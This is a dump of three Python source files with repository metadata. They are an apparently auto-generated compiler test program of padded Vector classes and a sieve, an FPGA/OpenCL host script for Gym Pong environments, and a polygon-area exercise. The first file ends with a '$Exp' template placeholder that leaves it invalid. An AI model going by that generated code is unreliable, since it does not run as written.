c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,758
|
py
|
# A resizable list of integers
class Vector(object):
items: [int] = None
size: int = 0
def __init__(self:"Vector"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector", idx: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector") -> int:
return self.size
# A resizable list of integers
class Vector2(object):
items: [int] = None
items2: [int] = None
size: int = 0
size2: int = 0
def __init__(self:"Vector2"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector2") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector2") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector2") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector2", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector2", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector2", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector2", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector2", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector2", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector2") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector2") -> int:
return self.size
# A resizable list of integers
class Vector3(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
def __init__(self:"Vector3"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector3") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector3") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector3") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector3", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector3", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector3", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector3", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector3", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector3", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector3") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector3") -> int:
return self.size
# A resizable list of integers
class Vector4(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
def __init__(self:"Vector4"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector4") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector4") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector4") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector4", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector4", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector4", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector4", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector4", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector4", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector4", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < $Exp.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
bb4690badb9ddcd0e9c039859751fd826c910d68
|
7b9d1eba54fdb805252ec4e29907b77e57567091
|
/gym_host_src/demo_generate/host_program.py
|
36ee37d7e7d1a415a0cffafb74002b4f9c4a2530
|
[] |
no_license
|
nathanpeura/FGym_EE599
|
8bb7739ea6403b4c284c398d75965987bb8af8d4
|
57f4359d6ea120f92cda14d01c78b2d3b69fc936
|
refs/heads/main
| 2023-05-06T04:47:07.361125
| 2021-05-27T04:09:26
| 2021-05-27T04:09:26
| 354,163,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,388
|
py
|
import os, sys
import numpy as np
import pyopencl as cl
import time
os.environ["PYOPENCL_CTX"] = '1'
from stable_baselines3.common.env_util import make_vec_env
import matplotlib.pyplot as plt
import gym
################## User input ###########################
# use host_params.in to define the parameters
# episode_num = 3
# iteration_max = 10000
# parallel_env = 4
environment = 'Pong-v4'
xclbin_kernel = "vadd_DDR_pong_1.xclbin"
generate_report = True
#########################################################
def read_in_params():
with open('host_params.in', 'r') as file:
data = file.read().replace('\n',' ').split(' ')
# data = data.split(' ')
n_param = data[1]
t_param = data[3]
m_param = data[5]
k_param = data[7]
return [n_param,t_param,m_param,k_param]
[n_param,t_param,m_param,k_param] = read_in_params()
#assume this is what these params are
parallel_env = int(n_param)
iteration_max = int(t_param)
episode_num = int(k_param)
class RL_data:
def __init__(self):
self.observation = []
self.reward = []
self.action = []
self.doneVec = []
def setup_device():
ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
mf = cl.mem_flags
dev =cl.get_platforms()[1].get_devices()
binary = open(xclbin_kernel, "rb").read()
prg = cl.Program(ctx,dev,[binary])
prg.build()
print(dev)
print("Device is programmed, testing...")
krnl_vadd = cl.Kernel(prg, "vadd")
return [ctx,queue,mf,krnl_vadd]
def generate_pre_exe_report(observation_flat,parallel_env,env):
print("\n########################")
print("Pre-execution report\n")
print("----------------------------")
print("Number of parallel environments: ", parallel_env)
print("Observation vector elements: ", len(observation_flat))
print("Observation vector bytes: ", observation_flat.nbytes)
action = np.full((parallel_env), 1) #dummy action vector
action_output = env.action_space.sample()
observation, reward, done, info = env.step(action)
reward_flat = reward.flatten()
print("----------------------------")
print("Environment Space")
print("Observation space: ", env.observation_space)
print("Action space: ", env.action_space)
print("----------------------------")
print("Environment State and Observation Shape")
print("Observation shape: ", observation.shape)
print("Reward shape: ", reward.shape)
print("----------------------------")
print("Environment IO Data sizes")
print("Observation element type: ", type(observation_flat[0]))
print("Reward element type: ", type(reward_flat[0]))
print("Action element type: ", type(action_output))
print("----------------------------")
env = make_vec_env(environment, n_envs=parallel_env)
observation = env.reset()
observation_flat = observation.flatten()
size_array = len(observation_flat)*parallel_env
start_time = time.time()
[ctx,queue,mf,krnl_vadd] = setup_device()
setup_time = time.time()
if(generate_report):
generate_pre_exe_report(observation_flat, parallel_env,env)
###### create output buffer, change this if your output is different than the type of observation
# output = np.full((parallel_env), np.uint8(1))
output = np.full((parallel_env), 1).astype(observation_flat[0]) #(np.float32)
throwaway_time1 = time.time()
res_g = cl.Buffer(ctx, mf.WRITE_ONLY, output.nbytes)
setup_time = setup_time - start_time + (time.time() - throwaway_time1) #time it takes to create the buffers and the connection
#############################################
test_pf = True
action = np.full((parallel_env), 1)
total_gym_time = 0
total_vitis_time = 0
total_openCL_time = 0
test_data = RL_data()
list_rewards = []
list_episodes = []
list_iteration = []
iteration = 0
for x in range(episode_num):
print("########## Episode number: ", x, " ##########")
test_data.observation = env.reset()
test_data.doneVec = np.full((parallel_env), False)
for count in range(iteration_max): #how many iterations to complete, will likely finish when 'done' is true from env.step
#####################################
# create observation and reward from Gym
start_time_gym = time.time()
# action = env.action_space.sample()
test_data.observation, test_data.reward, done, info = env.step(action)
observation = test_data.observation.flatten()
gym_time = time.time()
observation[0] = np.random.randint(0,6) #first val is used as the action, just random number 0 to 5
# print("iteration: ", count)
test_data.reward[0] = (np.random.randint(0,6))
test_data.reward = abs(test_data.reward.astype(np.float32)) #observation_flat[0])
list_rewards.append(test_data.reward[0])
list_iteration.append(iteration)
list_episodes.append(x)
# print("Reward: ", test_data.reward)
#####################################
#call kernel
for i in range(parallel_env):
if done[i] or test_data.doneVec[i]:
if not test_data.doneVec[i]:
print("Episode: ",x+1," Env ", i, " finished after {} timesteps".format(count))
test_data.doneVec[i] = True
if(test_data.doneVec.all()):
break
throwaway_time = time.time()
obs_buf = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=observation)
reward_buf = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=test_data.reward)
openCL_time = time.time()
krnl_vadd(queue, (1,), (1,), obs_buf, reward_buf, res_g, np.int32(size_array),np.int32(parallel_env)) #np.int32(reward[0]), np.int32(size_array),np.int32(parallel_env))
kernel_time = time.time()
res_np = np.empty_like(output)
cl.enqueue_copy(queue, res_np, res_g)
openCL_time_2 = openCL_time - throwaway_time + time.time() - kernel_time
test_data.action = res_np
vitis_time = kernel_time - openCL_time
print("reward: ", test_data.reward)
gym_time -= start_time_gym
total_gym_time += gym_time
total_vitis_time += vitis_time
total_openCL_time += openCL_time_2
kernel_time = kernel_time - openCL_time
for j in range(len(res_np)): #created to compare the output with the expected output
if(res_np[j] != test_data.reward[j]):
print("Not equal!")
test_pf = False
break
iteration += 1
print("########## Test completed ##########")
total_time = total_gym_time + total_vitis_time + setup_time + total_openCL_time
f = open("data_out.txt", "w")
str_data = str(total_time-total_gym_time-total_vitis_time) + "\n" + str(total_time) + "\n"
f.write(str_data)
f.close()
if(test_pf):
print("Test passed!")
else:
print("Test failed!")
env.close()
###### generate plot of reward
fig, ax = plt.subplots(constrained_layout=True)
plt.scatter(list_iteration, list_rewards)
ax.set_title('Reward Vs Episodes')
ax.set_xlabel('Iterations')
ax.set_ylabel('Reward')
ax.set_ylim([0,15])
secax = ax.twiny()
secax.set_xticks(list_episodes)
secax.set_xlabel("Episode")
for x in range(episode_num):
plt.axvline(x, color='black')
plt.savefig("./inf_reward_plot.png")
|
[
"njpeura@gmail.com"
] |
njpeura@gmail.com
|
51e9fc0ea8214b1bd2cc148164c6b4ee4a963159
|
61dcd9b485bc5e6d07c4adf14f138eabaa9a23b5
|
/Own practice/3.2/3.5.py
|
1994d93572f6c634c3da216c8366c94cb132b244
|
[] |
no_license
|
bong1915016/Introduction-to-Programming-Using-Python
|
d442d2252d13b731f6cd9c6356032e8b90aba9a1
|
f23e19963183aba83d96d9d8a9af5690771b62c2
|
refs/heads/master
| 2020-09-25T03:09:34.384693
| 2019-11-28T17:33:28
| 2019-11-28T17:33:28
| 225,904,132
| 1
| 0
| null | 2019-12-04T15:56:55
| 2019-12-04T15:56:54
| null |
UTF-8
|
Python
| false
| false
| 574
|
py
|
"""
程式設計練習題 2.2-2.10 3.5 幾何:n多邊形面積.
正多邊行為帶有n個邊、各邊等長、各角度也相同的正多邊形,計算正多邊形面積的公式:
Area = (n * tan(pi / n)) / 4 * s ** 2
提示使用者輸入邊長,接著顯示其面積,以下是程式的執行結果:
```
Enter the side:5.5
The area of the pentagon is 52.04444136781625
```
"""
import math
n = eval(input("Enter the number of side:"))
s = eval(input("Enter the side:"))
area = (n * s ** 2) / (4 * math.tan(math.pi / n))
print("The area of the pentagon is", area)
|
[
"38396747+timmy61109@users.noreply.github.com"
] |
